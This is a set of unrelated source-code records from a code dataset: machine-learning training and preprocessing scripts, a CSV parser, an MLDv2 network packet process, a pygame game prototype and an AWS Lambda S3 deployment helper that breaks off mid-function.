filename_csv=csv_valid)\nwrite_images_labels_csv(files_test, labels_test,\n filename_csv=csv_test)\n\nimport pandas as pd\nfor csv_file in [csv_train, csv_valid, csv_test]:\n df = pd.read_csv(csv_file)\n print(len(df))\n for label in [0, 1]:\n df1 = df[df['labels'] == label]\n print(str(label), len(df1))\n\n''' \n1045\n0 706\n1 339\n220\n0 144\n1 76\n212\n0 151\n1 61\n'''\n\n\n\nprint('OK')\n\n","sub_path":"data_process/my_gen_csv.py","file_name":"my_gen_csv.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"186658278","text":"import sys\nimport os\nimport argparse\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom utils.dataloader import AudioNpyNameLoader, VCTK_NAME_collate\n\nsys.path.append('logger')\nfrom logger import Logger\nfrom logger_utils import prepare_directories_and_logger\n\nsys.path.append('utils')\nfrom save_and_load import save_checkpoint, load_checkpoint\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-train_dir', '--train_dir', type=str, required = True,\n help = 'preprocessed npy files in train dir')\nparser.add_argument('-test_dir','--test_dir', type=str, required = False, default=None,\n help = 'preprocessed npy files of test dir')\nparser.add_argument('-m', '--model', type=str, required= True,\n help='model type in model dir')\nparser.add_argument('-n', '--n_embed', type=str,required= True,\n help='number of vectors in codebook')\nparser.add_argument('-ch', '--channel', type=str, required= True,\n help='channel number in VQVC+')\nparser.add_argument('-t', '--trainer', type=str, required= True,\n help = 'which trainer do you want? (rhythm, mean_std, normal)')\nparser.add_argument('--load_checkpoint', type=bool, default=False,\n required=False)\n\n\nargs = parser.parse_args()\nlogger = prepare_directories_and_logger(Logger, output_directory = f'output/{args.model}_n{args.n_embed}_ch{args.channel}_{args.trainer}')\n\nimport importlib\n\ntrainer = importlib.import_module(f'trainer.{args.trainer}')\ntrain_ = getattr(trainer, 'train_')\n\nmodel = importlib.import_module(f'model.{args.model}.vq_model')\nmodel = getattr(model, 'VC_MODEL')\n'''\nDataset and loader\n'''\ndef make_inf_iterator(data_iterator):\n while True:\n for data in data_iterator:\n yield data\n\naudio_dir = args.train_dir#\"/home/ericwudayi/nas189/homes/ericwudayi/VCTK-Corpus/mel3/mel.melgan\"\n\ndataset = AudioNpyNameLoader(audio_dir)\nloader = DataLoader(dataset, batch_size=16, shuffle=True, num_workers=8,collate_fn=VCTK_NAME_collate)\n\nif args.test_dir != None:\n audio_dir_test = args.test_dir#\"/home/ericwudayi/nas189/homes/ericwudayi/VCTK-Corpus/mel3/mel.test\"\nelse:\n audio_dir_test = audio_dir\n print (\"None test dir, use train dir instead\")\ndataset_test = AudioNpyNameLoader(audio_dir_test)\ntest_loader = DataLoader(dataset_test, batch_size=8, shuffle=True, num_workers=4,collate_fn=VCTK_NAME_collate)\ninf_iterator_test = make_inf_iterator(test_loader)\n'''\nModel Initilization\n'''\nmodel = model(in_channel=80,channel=int(args.channel),n_embed=int(args.n_embed)).cuda()\nopt = optim.Adam(model.parameters())\n'''\nTraining\n'''\ncriterion = nn.L1Loss()\nlatent_loss_weight = 0.1\niteration = 0\nif args.load_checkpoint==True:\n model, opt, iteration = load_checkpoint(f'checkpoint/{args.model}_n{args.n_embed}_ch{args.channel}_{args.trainer}/gen', model, opt) \n\n\ntrain_(args, model, opt, latent_loss_weight, criterion, loader, 800, 
inf_iterator_test, logger, iteration)","sub_path":"train_name.py","file_name":"train_name.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"20442864","text":"import csv\r\nimport re\r\n\r\n\r\n## inputFile = str(input(\"What is the input file?:\"))\r\n##saveFile = str(input(\"What do you want to name your output file?:\"))\r\n\r\n##user enter oil type as defined in Ample W/O \"Production\" column\r\n##Oil Black Widow\r\n##Oil Jesus OG\r\n##Oil Sativa Blend\r\n##etc....\r\ndef queryOilStrain():\r\n \"get input oil strain type\"\r\n lotType = str(input(\"What lot/strain type?:\"))\r\n\r\n return lotType\r\n\r\nresult={}\r\n\r\n#create a list of all WO Types\r\ndef getWOList(inputFile=\"workOrders\", lotType=\"Oil Black Widow\"):\r\n\r\n with open(inputFile+\".csv\", \"r\") as sourceFile:\r\n csv_reader = csv.reader(sourceFile, delimiter =\",\")\r\n woType = []\r\n for line in csv_reader:\r\n if line[5] == lotType and line[1] not in woType:\r\n woType.append(line[1])\r\n \r\n return woType\r\n\r\nresult[\"Work Orders Completed\"] = getWOList()\r\n \r\n##put all oil lots into a list\r\ndef getOilLotCodes(inputFile=\"workOrders\", lotType=\"Oil Black Widow\"):\r\n \"collect all lot numbers of a given oil production into a list\"\r\n \r\n with open(inputFile+\".csv\", \"r\") as sourceFile:\r\n csv_reader = csv.reader(sourceFile, delimiter=',')\r\n lotList = []\r\n for line in csv_reader:\r\n if line[5] == lotType and len(line[3])<8:\r\n \r\n ## find lot numbers of len 4\r\n m = re.match(r\"^\\d{4}(?!\\d)\", line[3])\r\n if m!= None:\r\n if m.group() not in lotList:\r\n lotList.append(m.group())\r\n ## find lot numbers of len 3 \r\n n = re.match(r\"^\\d{3}(?!/d)\", line[3])\r\n if n!= None:\r\n if n.group() not in lotList:\r\n lotList.append(n.group())\r\n lotList.sort() \r\n \r\n return lotList\r\n\r\nlotList = getOilLotCodes()\r\nprint(\"LOT LIST BELOW\")\r\nprint(lotList)\r\n\r\nresult[\"Lot List\"] = getOilLotCodes()\r\n\r\ndef getAllInputs(result = result, inputFile=\"workOrders\",):\r\n \"\"\r\n\r\n with open(inputFile+\".csv\", \"r\") as sourceFile:\r\n file = csv.reader(sourceFile, delimiter=',')\r\n\r\n for order in result[\"Work Orders Completed\"]:\r\n getInput(workOrderType = order)\r\n\r\n\r\n\r\n\r\n\r\n return None\r\n\r\n\r\ndef getInput(inputFile=\"workOrders\", lotList = lotList, workOrderType=\"Oil - Milling\"):\r\n \"given a list of lot numbers return a list of equal len/order of input mass in grams\"\r\n with open(inputFile+\".csv\", \"r\") as sourceFile:\r\n file = csv.reader(sourceFile, delimiter=',')\r\n \r\n inputList = []\r\n holdingVar = 0\r\n\r\n for line in file:\r\n for item in lotList:\r\n\r\n if len(item)==4:\r\n m = re.match(r\"^\\d{4}(?!\\d)\", line[3])\r\n if m:\r\n if line[3] == item and line[1]==workOrderType:\r\n inputList.append([line[3], line[6]])\r\n \r\n if len(item) ==3:\r\n n = re.match(r\"^\\d{3}(?!\\d)\", line[3])\r\n if n:\r\n \r\n if line[3] == item and line[1]==workOrderType:\r\n\r\n inputList.append([line[3], line[6]])\r\n \r\n result[workOrderType] = inputList\r\n \r\n return inputList\r\n\r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n","sub_path":"fileIO/listWork.py","file_name":"listWork.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"75341537","text":"cl_commands={\n \"/quit\": quit,\n \"/join\": quit\n }\n\nsv_commands={\n \"/quit\": quit\n }\n\ndef 
parse(data, sv=True):\n data=data.strip()\n\n if data.startswith(\"/\"):\n cmd=\"NULL\"\n args=\"\"\n\n splitdata=data.split(\" \", 1)\n\n if splitdata != []:\n cmd=splitdata[0]\n if len(splitdata) >= 2:\n args=splitdata[1]\n\n if sv:\n if cmd in sv_commands:\n return sv_commands[cmd](args)\n else:\n return \"No such server command %s\" % cmd\n else:\n if cmd in cl_commands:\n return cl_commands[cmd](args)\n else:\n return \"No such client command %s\" % cmd\n","sub_path":"src/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29680451","text":"# coding: utf-8\n# zmq install\n# >sudo apt-get install libzmq-dev\n# >sudo apt-get install python-zmq\n\nfrom ryu.ofproto import ether, inet\nfrom ryu.lib.packet import ethernet, ipv6, icmpv6, vlan\nfrom ryu.lib import hub\nfrom scapy import sendrecv\nfrom scapy import packet as scapy_packet\nfrom eventlet import patcher\nfrom icmpv6_extend import icmpv6_extend\nimport os\nimport logging\nimport logging.config\nimport cPickle\nimport zmq\nhub.patch()\n\n\n# ======================================================================\n# mld_process\n# ======================================================================\nclass mld_process():\n\n # send interval(sec)\n WAIT_TIME = 20\n\n IPC = \"ipc://\"\n SEND_PATH = \"/tmp/feeds/mld-ryu\"\n RECV_PATH = \"/tmp/feeds/ryu-mld\"\n IPC_PATH_SEND = IPC + SEND_PATH\n IPC_PATH_RECV = IPC + RECV_PATH\n\n BASEPATH = os.path.dirname(os.path.abspath(__file__))\n MULTICAST_SERVICE_INFO = os.path.normpath(\n os.path.join(BASEPATH, \"./multicast_service_info.csv\"))\n ADDRESS_INFO = os.path.normpath(\n os.path.join(BASEPATH, \"./address_info.csv\"))\n addressinfo = []\n\n org_thread = patcher.original(\"threading\")\n org_thread_time = patcher.original(\"time\")\n\n def __init__(self):\n logging.config.fileConfig(\"../../logconf.ini\")\n self.logger = logging.getLogger(__name__)\n self.logger.debug(\"\")\n\n for line in open(self.ADDRESS_INFO, \"r\"):\n if line[0] == \"#\":\n continue\n else:\n columns = list(line[:-1].split(\",\"))\n for column in columns:\n self.addressinfo.append(column)\n\n self.logger.debug(\"addressinfo : %s\", str(self.addressinfo))\n\n # CHECK TMP FILE(SEND)\n self.check_exists_tmp(self.SEND_PATH)\n\n # CHECK TMP FILE(RECV)\n self.check_exists_tmp(self.RECV_PATH)\n \n ctx = zmq.Context()\n self.send_sock = ctx.socket(zmq.PUB)\n self.send_sock.bind(self.IPC_PATH_SEND)\n\n self.recv_sock = ctx.socket(zmq.SUB)\n self.recv_sock.connect(self.IPC_PATH_RECV)\n self.recv_sock.setsockopt(zmq.SUBSCRIBE, \"\")\n\n # ==================================================================\n # check_exists_tmp\n # ==================================================================\n def check_exists_tmp(self, filename):\n self.logger.debug(\"\")\n\n if os.path.exists(filename):\n return\n\n else:\n f = open(filename, \"w\")\n f.write(\"\")\n f.close()\n self.logger.info(\"create file [%s]\", filename)\n\n # ==================================================================\n # send_mldquey_regularly\n # ==================================================================\n def send_mldquey_regularly(self):\n self.logger.debug(\"\")\n mc_service_info_list = []\n for line in open(self.MULTICAST_SERVICE_INFO, \"r\"):\n if line[0] == \"#\":\n continue\n else:\n # multicast_addr, srcip_addr\n column = list(line[:-1].split(\",\"))\n mc_service_info_list.append(column)\n self.logger.debug(\n 
\"send address(multicast_addr, srcip_addr) : %s\",\n str(mc_service_info_list))\n\n while True:\n for mc_service_info in mc_service_info_list:\n ip_addr_list = []\n if not mc_service_info[1] == \"\":\n ip_addr_list.append(mc_service_info[1])\n mld = self.create_mldquery(\n mc_service_info[0], ip_addr_list)\n sendpkt = self.create_packet(self.addressinfo, mld)\n self.send_packet_to_sw(sendpkt)\n hub.sleep(self.WAIT_TIME)\n\n # ==================================================================\n # create_mldquery\n # ==================================================================\n def create_mldquery(self, mc_addr, ip_addr_list):\n self.logger.debug(\"\")\n return icmpv6.mldv2_query(address=mc_addr, srcs=ip_addr_list,\n maxresp=10000, qqic=15)\n\n # ==================================================================\n # create_mldreport\n # ==================================================================\n def create_mldreport(self, mc_service_info):\n self.logger.debug(\"\")\n\n src_list = []\n src_list.append(mc_service_info[1])\n\n record_list = []\n record_list.append(icmpv6.mldv2_report_group(\n type_=icmpv6.MODE_IS_INCLUDE,\n num=1,\n address=mc_service_info[0],\n srcs=src_list))\n\n return icmpv6.mldv2_report(records=record_list)\n\n # ==================================================================\n # create_packet\n # ==================================================================\n def create_packet(self, addressinfo, mld):\n self.logger.debug(\"\")\n\n # ETHER\n eth = ethernet.ethernet(\n# ethertype=ether.ETH_TYPE_8021Q\n ethertype=ether.ETH_TYPE_IPV6, \n src=addressinfo[0], dst=addressinfo[1])\n\n# TODO\n \"\"\"\n # VLAN\n vln = vlan.vlan(vid=100, ethertype=ether.ETH_TYPE_IPV6)\n \"\"\"\n # IPV6 with Hop-By-Hop\n ext_headers = [ipv6.hop_opts(nxt=inet.IPPROTO_ICMPV6,\n data=[ipv6.option(type_=5, len_=2, data=\"\\x00\\x00\"),\n ipv6.option(type_=1, len_=0)])]\n ip6 = ipv6.ipv6(src=addressinfo[2], dst=addressinfo[3],\n hop_limit=1, nxt=inet.IPPROTO_HOPOPTS,\n ext_hdrs=ext_headers)\n\n # MLDV2\n if type(mld) == icmpv6.mldv2_query:\n icmp6 = icmpv6_extend(\n type_=icmpv6.MLD_LISTENER_QUERY, data=mld)\n\n elif type(mld) == icmpv6.mldv2_report:\n icmp6 = icmpv6_extend(\n type_=icmpv6.MLDV2_LISTENER_REPORT, data=mld)\n\n # ether - vlan - ipv6 - icmpv6 ( - mldv2 )\n# sendpkt = eth / vln / ip6 / icmp6\n sendpkt = eth / ip6 / icmp6\n sendpkt.serialize()\n self.logger.debug(\"created packet(ryu) : %s\", str(sendpkt))\n\n return sendpkt\n\n # ==================================================================\n # send_packet_to_sw\n # ==================================================================\n def send_packet_to_sw(self, ryu_packet):\n self.logger.debug(\"\")\n sendpkt = scapy_packet.Packet(ryu_packet.data)\n\n # send of scapy\n sendrecv.sendp(sendpkt)\n self.logger.info(\"sent 1 packet to switch.\")\n\n # ==================================================================\n # send_packet_to_ryu\n # ==================================================================\n def send_packet_to_ryu(self, ryu_packet):\n self.logger.debug(\"\")\n\n # send of zeromq\n self.send_sock.send(cPickle.dumps(ryu_packet, protocol=0))\n self.logger.info(\"sent 1 packet to ryu. 
= \" + str(ryu_packet))\n\n # ==================================================================\n # distribute_receive_packet\n # ==================================================================\n def distribute_receive_packet(self, packet):\n self.logger.debug(\"\")\n self.logger.debug(\"###packet=\" + str(packet))\n pkt_eth = packet.get_protocols(ethernet.ethernet)\n pkt_ipv6 = packet.get_protocols(ipv6.ipv6)\n pkt_icmpv6_list = packet.get_protocols(icmpv6.icmpv6)\n self.logger.debug(\"pkt_eth\" + str(pkt_eth))\n self.logger.debug(\"pkt_ipv6\" + str(pkt_ipv6))\n self.logger.debug(\"pkt_icmpv6_list\" + str(pkt_icmpv6_list))\n\n for pkt_icmpv6 in pkt_icmpv6_list:\n # MLDv2 Query\n if pkt_icmpv6.type_ == icmpv6.MLD_LISTENER_QUERY:\n self.logger.debug(\"MLDv2 Query : %s\",\n str(pkt_icmpv6.data))\n self.send_reply()\n\n # MLDv2 Report\n if pkt_icmpv6.type_ == icmpv6.MLDV2_LISTENER_REPORT:\n self.logger.debug(\"MLDv2 Report : %s\",\n str(pkt_icmpv6.data))\n self.send_multicast_info(pkt_icmpv6)\n\n # ==================================================================\n # send_reply\n # ==================================================================\n def send_reply(self):\n self.logger.debug(\"\")\n \n mc_info_list = self.load_multicast_info()\n for mc_info in mc_info_list:\n mld = self.create_mldreport(mc_info)\n sendpkt = self.create_packet(self.addressinfo, mld)\n self.send_packet_to_ryu(sendpkt)\n\n # ==================================================================\n # load_multicast_info\n # ==================================================================\n def load_multicast_info(self):\n self.logger.debug(\"\")\n# TODO p-inしたReportから保持した情報を返却する\n# (暫定でファイルからの読み込み)\n mc_service_info_list = []\n for line in open(self.MULTICAST_SERVICE_INFO, \"r\"):\n if line[0] == \"#\":\n continue\n else:\n # mc_addr, ip_addr\n column = list(line[:-1].split(\",\"))\n mc_service_info_list.append(column)\n return mc_service_info_list\n\n # ==================================================================\n # send_multicast_info\n # ==================================================================\n def send_multicast_info(self, pkt):\n self.logger.debug(\"\")\n self.regist_multicast_info(pkt)\n# TODO p-outの情報を設定したReportを生成する\n# sendpkt = self.create_mldreport((\"\", \"\"))\n# self.send_packet_to_ryu(sendpkt)\n\n # ==================================================================\n # regist_multicast_info\n # ==================================================================\n def regist_multicast_info(self, pkt):\n self.logger.debug(\"\")\n# TODO p-inしたReportの情報をメモリ上に保持する\n\n # ==================================================================\n # receive_from_ryu\n # ==================================================================\n def receive_from_ryu(self):\n self.logger.debug(\"\")\n while True:\n # receive of zeromq\n recvpkt = self.recv_sock.recv()\n packet = cPickle.loads(recvpkt)\n self.logger.debug(\"packet : %s\", str(packet))\n self.distribute_receive_packet(packet)\n\n self.org_thread_time.sleep(1)\n\nif __name__ == \"__main__\":\n mld_proc = mld_process()\n hub.spawn(mld_proc.send_mldquey_regularly)\n recv_thre = mld_proc.org_thread.Thread(\n target=mld_proc.receive_from_ryu,\n name=\"ReceiveThread\")\n recv_thre.start()\n while True:\n hub.sleep(1)\n","sub_path":"mld/app/mld_process.py","file_name":"mld_process.py","file_ext":"py","file_size_in_byte":11101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"407009416","text":"#-*-Encoding:utf-8-*-\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\n\npygame.init()\nscreen = pygame.display.set_mode((480, 700)) #设置窗口宽度和高度\npygame.display.set_caption('飞机大战') #设置窗口标题\n\nplane_img = pygame.image.load('resources/image/shoot.png') #设置资源图片\nbackground = pygame.image.load('resources/image/round1.jpg').convert() #设置背景图片\n\nplayer = plane_img.subsurface(pygame.Rect(0, 99, 102, 126)) #玩家图片\nplayer_pos = [100, 200]\nenemy1 = plane_img.subsurface(pygame.Rect(534, 612, 57, 43)) #敌机图片\nenemy2 = plane_img.subsurface(pygame.Rect(534, 612, 57, 43))\nenemy3 = plane_img.subsurface(pygame.Rect(534, 612, 57, 43))\nenemy1_pos = [200, 0]\nenemy2_pos = [300, 100]\nenemy3_pos = [260, 400]\nclock = pygame.time.Clock()\n\nwhile True:\n clock.tick(60) #设置帧率\n screen.fill(0)\n screen.blit(background, (0, 0)) #把背景图贴到游戏窗口上\n screen.blit(player, player_pos) #把玩家图片贴到游戏窗口上\n screen.blit(enemy1, enemy1_pos) #把敌机图片贴到游戏窗口上\n screen.blit(enemy2, enemy2_pos)\n screen.blit(enemy3, enemy3_pos)\n enemy1_pos[1] += 1\n enemy2_pos[1] += 1\n enemy3_pos[1] += 2\n\n key_pressed = pygame.key.get_pressed()\n if key_pressed[K_w] or key_pressed[K_UP]:\n player_pos[1] -= 2\n if key_pressed[K_s] or key_pressed[K_DOWN]:\n player_pos[1] += 2\n if key_pressed[K_a] or key_pressed[K_LEFT]:\n player_pos[0] -= 2\n if key_pressed[K_d] or key_pressed[K_RIGHT]:\n player_pos[0] += 2\n\n for event in pygame.event.get():\n if event.type == QUIT: #定义关闭游戏窗口的事件\n pygame.quit()\n exit()\n pygame.display.update() #更新整个窗口的内容\n","sub_path":"test/v04.py","file_name":"v04.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"472234457","text":"def sumPair(arr, key):\n s = set()\n for i in range(0, len(arr)):\n temp = key - arr[i]\n if (temp in s):\n return (temp, arr[i])\n s.add(arr[i])\n\ninpArr = [int(ele) for ele in input('Enter the array element: ').split()]\nkey = int(input('Enter the key value: '))\nprint(f'The pair that evaluates to {key} is {sumPair(inpArr, key)}')\n","sub_path":"Day 25 - Two Sum.py","file_name":"Day 25 - Two Sum.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468388825","text":"import numpy as np\nimport pandas as pd\nfrom numpy import genfromtxt\nfrom numpy import ravel\nimport h5py\nfrom numpy import (array, dot, arccos)\nfrom numpy.linalg import norm\n\nnr=3000\n\ndf = pd.read_csv('training.csv',header=0)\ndfp = pd.read_csv('test.csv',header=0)\n\ndef dist(x,y): \n return np.sqrt(np.sum((x-y)**2))\n\ndef image_histogram_equalization(image, number_bins=256):\n # from http://www.janeriksolem.net/2009/06/histogram-equalization-with-python-and.html\n\n # get image histogram\n image_histogram, bins = np.histogram(image.flatten(), number_bins, normed=True)\n cdf = image_histogram.cumsum() # cumulative distribution function\n cdf = 255 * cdf / cdf[-1] # normalize\n\n # use linear interpolation of cdf to find new pixel values\n image_equalized = np.interp(image.flatten(), bins[:-1], cdf)\n\n return image_equalized.reshape(image.shape), cdf\n\ndef certainty(row, name):\n return 0.00 if np.isnan(row[name]) else 1.0\n\ny = df.drop(['Image'], axis=1)\n\nprint('#1')\nprint(y[nr:nr+1])\n\ndict_certainity = {c + '_certainty':y.apply (lambda row: certainty(row, c),axis=1) for c in y.columns}\ncertainty = pd.DataFrame(dict_certainity)\n\ny_imp = y.copy()\nfor c in y.columns:\n 
y_imp[c].fillna(y_imp[c].median(), inplace=True )\n\ny_imp = y_imp.values \ny_imp = y_imp.astype(np.float32) \ny = y_imp.reshape((-1,30))\n\nprint('#2')\nprint(y[nr:nr+1])\n\n\n\ncertainty = certainty.values\ncertainty = certainty.astype(np.float32) \ncertainty = certainty.reshape((-1,30))\n\ny = y / 96\n\nprint ('Y shape', y.shape)\n\n# Extracting Images\n\ndf['Image'] = df['Image'].apply(lambda im: np.fromstring(im, sep=' ') )\nX = np.vstack (df['Image'].values) \n\nX = X.reshape(-1,96,96)\n\n# Histogram equalization\nfor i in range(len(X)):\n X[i, :, :] = image_histogram_equalization(X[i, :,:])[0]\n\n\nX = X.astype(np.float32)\nX = X/255 \nX = X.reshape(-1,1,96,96)\n\n#print ('X:', X.shape)\n\nprint ('Shape', 'Labels', X.shape, y.shape)\n\n\ndfp['Image'] = dfp['Image'].apply(lambda im: np.fromstring(im, sep=' ') )\nXp = np.vstack (dfp['Image'].values) \n\nXp = Xp.reshape(-1,96,96)\nfor i in range(len(Xp)):\n Xp[i, :, :] = image_histogram_equalization(Xp[i,:,:])[0]\n\n\nXp = Xp.astype(np.float32)\nXp = Xp/255 \nXp = Xp.reshape(-1,1,96,96)\n\n#print ('X:', X.shape)\n\nprint ('Shape of predict', Xp.shape)\n\n\n\n#X_train, X_test, y_train, y_test = cross_validation.train_test_split(X,labels, test_size=0.30)\n\nX_test = X[:1600]\ny_test = y[:1600]\ncertainty_test = certainty[:1600] \n\nX_train = X[1600:]\ny_train = y[1600:]\ncertainty_train = certainty[1600:] \n\nprint ('Train, Test shapes (X,y):', X_train.shape, y_train.shape, X_test.shape, y_test.shape)\n\n# Train data\nf = h5py.File(\"facialkp-train.hd5\", \"w\")\nf.create_dataset(\"data\", data=X_train, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=y_train, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=certainty_train, compression=\"gzip\", compression_opts=4)\nf.close()\n\n#Test data\nf = h5py.File(\"facialkp-test.hd5\", \"w\")\nf.create_dataset(\"data\", data=X_test, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=y_test, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=certainty_test, compression=\"gzip\", compression_opts=4)\nf.close()\n\n# Full train data\nf = h5py.File(\"facialkp-full-train.hd5\", \"w\")\nf.create_dataset(\"data\", data=X, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=y, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=certainty, compression=\"gzip\", compression_opts=4)\nf.close()\n\n# Predict data\nf = h5py.File(\"facialkp-unlabeled.hd5\", \"w\")\nf.create_dataset(\"data\", data=Xp, compression=\"gzip\", compression_opts=4)\nf.close()\n\ndef flip_labels_lr(labels):\n (left_eye_center_x,left_eye_center_y, \\\n right_eye_center_x,right_eye_center_y, \\\n left_eye_inner_corner_x,left_eye_inner_corner_y, \\\n left_eye_outer_corner_x,left_eye_outer_corner_y, \\\n right_eye_inner_corner_x,right_eye_inner_corner_y, \\\n right_eye_outer_corner_x,right_eye_outer_corner_y, \\\n left_eyebrow_inner_end_x,left_eyebrow_inner_end_y, \\\n left_eyebrow_outer_end_x,left_eyebrow_outer_end_y, \\\n right_eyebrow_inner_end_x,right_eyebrow_inner_end_y, \\\n right_eyebrow_outer_end_x,right_eyebrow_outer_end_y, \\\n nose_tip_x,nose_tip_y, \\\n mouth_left_corner_x,mouth_left_corner_y, \\\n mouth_right_corner_x,mouth_right_corner_y, \\\n mouth_center_top_lip_x,mouth_center_top_lip_y, \\\n mouth_center_bottom_lip_x,mouth_center_bottom_lip_y) = labels\n\n left_eye_center_x_fl, left_eye_center_y_fl = (1.0 - right_eye_center_x), right_eye_center_y\n 
right_eye_center_x_fl,right_eye_center_y_fl = (1.0 - left_eye_center_x), left_eye_center_y\n left_eye_inner_corner_x_fl,left_eye_inner_corner_y_fl = (1.0 - right_eye_inner_corner_x),right_eye_inner_corner_y\n left_eye_outer_corner_x_fl,left_eye_outer_corner_y_fl = (1.0 - right_eye_outer_corner_x),right_eye_outer_corner_y\n right_eye_inner_corner_x_fl,right_eye_inner_corner_y_fl = (1.0 - left_eye_inner_corner_x),left_eye_inner_corner_y\n right_eye_outer_corner_x_fl,right_eye_outer_corner_y_fl = (1.0 - left_eye_outer_corner_x),left_eye_outer_corner_y\n left_eyebrow_inner_end_x_fl,left_eyebrow_inner_end_y_fl = (1.0 - right_eyebrow_inner_end_x),right_eyebrow_inner_end_y\n left_eyebrow_outer_end_x_fl,left_eyebrow_outer_end_y_fl = (1.0 - right_eyebrow_outer_end_x),right_eyebrow_outer_end_y\n right_eyebrow_inner_end_x_fl,right_eyebrow_inner_end_y_fl = (1.0 - left_eyebrow_inner_end_x),left_eyebrow_inner_end_y\n right_eyebrow_outer_end_x_fl,right_eyebrow_outer_end_y_fl = (1.0 - left_eyebrow_outer_end_x),left_eyebrow_outer_end_y\n nose_tip_x_fl,nose_tip_y_fl = (1.0 - nose_tip_x),nose_tip_y\n mouth_left_corner_x_fl,mouth_left_corner_y_fl = (1.0 - mouth_right_corner_x),mouth_right_corner_y\n mouth_right_corner_x_fl,mouth_right_corner_y_fl = (1.0 - mouth_left_corner_x),mouth_left_corner_y\n mouth_center_top_lip_x_fl,mouth_center_top_lip_y_fl = (1.0 - mouth_center_top_lip_x),mouth_center_top_lip_y\n mouth_center_bottom_lip_x_fl,mouth_center_bottom_lip_y_fl = (1.0 - mouth_center_bottom_lip_x),mouth_center_bottom_lip_y\n\n return np.array([left_eye_center_x_fl,left_eye_center_y_fl, \\\n right_eye_center_x_fl,right_eye_center_y_fl, \\\n left_eye_inner_corner_x_fl,left_eye_inner_corner_y_fl, \\\n left_eye_outer_corner_x_fl,left_eye_outer_corner_y_fl, \\\n right_eye_inner_corner_x_fl,right_eye_inner_corner_y_fl, \\\n right_eye_outer_corner_x_fl,right_eye_outer_corner_y_fl, \\\n left_eyebrow_inner_end_x_fl,left_eyebrow_inner_end_y_fl, \\\n left_eyebrow_outer_end_x_fl,left_eyebrow_outer_end_y_fl, \\\n right_eyebrow_inner_end_x_fl,right_eyebrow_inner_end_y_fl, \\\n right_eyebrow_outer_end_x_fl,right_eyebrow_outer_end_y_fl, \\\n nose_tip_x_fl,nose_tip_y_fl, \\\n mouth_left_corner_x_fl,mouth_left_corner_y_fl, \\\n mouth_right_corner_x_fl,mouth_right_corner_y_fl, \\\n mouth_center_top_lip_x_fl,mouth_center_top_lip_y_fl, \\\n mouth_center_bottom_lip_x_fl,mouth_center_bottom_lip_y_fl])\n\nXflipped = X.copy()\nYflipped = y.copy()\ncertainty_flipped = certainty.copy()\nfor i in range(X.shape[0]):\n Xflipped[i,0,:,:] = np.fliplr(Xflipped[i,0,:,:])\n Yflipped[i,:] = flip_labels_lr(Yflipped[i,:])\n certainty_flipped[i,:] = flip_labels_lr(certainty_flipped[i,:])\n\nf = h5py.File(\"facialkp-flipped-train.hd5\", \"w\")\nf.create_dataset(\"data\", data=Xflipped, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=Yflipped, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=certainty_flipped, compression=\"gzip\", compression_opts=4)\nf.close()\n\nXextended = np.vstack((X,Xflipped))\nYextended = np.vstack((y,Yflipped))\nCextended = np.vstack((certainty,certainty_flipped))\n\nf = h5py.File(\"facialkp-extended-train.hd5\", \"w\")\nf.create_dataset(\"data\", data=Xextended, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"label\", data=Yextended, compression=\"gzip\", compression_opts=4)\nf.create_dataset(\"certainty\", data=Cextended, compression=\"gzip\", 
compression_opts=4)\nf.close()\n","sub_path":"fkp.py","file_name":"fkp.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"500238842","text":"# Invoked by: CloudFormation\n# Returns: A `Data` object to a pre-signed URL\n#\n# Deploys the contents of a versioned zip file object from one bucket in S3\n# to a another bucket\n\nimport boto3\nfrom botocore.client import Config\nimport io\nimport zipfile\nimport os\nimport urllib.request\nimport json\nimport traceback\nimport mimetypes\nimport re\n\ns3 = boto3.client(\"s3\", config=Config(signature_version=\"s3v4\"))\n\nSTATUS_SUCCESS = \"SUCCESS\"\nSTATUS_FAILED = \"FAILED\"\n\nmimetypes.init()\nmimetypes.add_type(\"application/json\", \"json\")\nmimetypes.add_type(\"application/ttf\", \"ttf\")\nmimetypes.add_type(\"application/eot\", \"eot\")\nmimetypes.add_type(\"application/otf\", \"otf\")\nmimetypes.add_type(\"application/woff\", \"woff\")\n\n\ndef send_response(event, context, res_status, res_reason=\"Done\", res_data={}):\n print(f\"Sending {res_status} response\")\n\n res_data = json.dumps(\n {\n \"Status\": res_status,\n \"Reason\": res_reason,\n \"PhysicalResourceId\": context.log_stream_name,\n \"StackId\": event[\"StackId\"],\n \"RequestId\": event[\"RequestId\"],\n \"LogicalResourceId\": event[\"LogicalResourceId\"],\n \"Data\": res_data,\n }\n ).encode()\n\n headers = {\"content-type\": \"\"}\n\n url = event[\"ResponseURL\"]\n req = urllib.request.Request(url, data=res_data, method=\"PUT\", headers=headers)\n 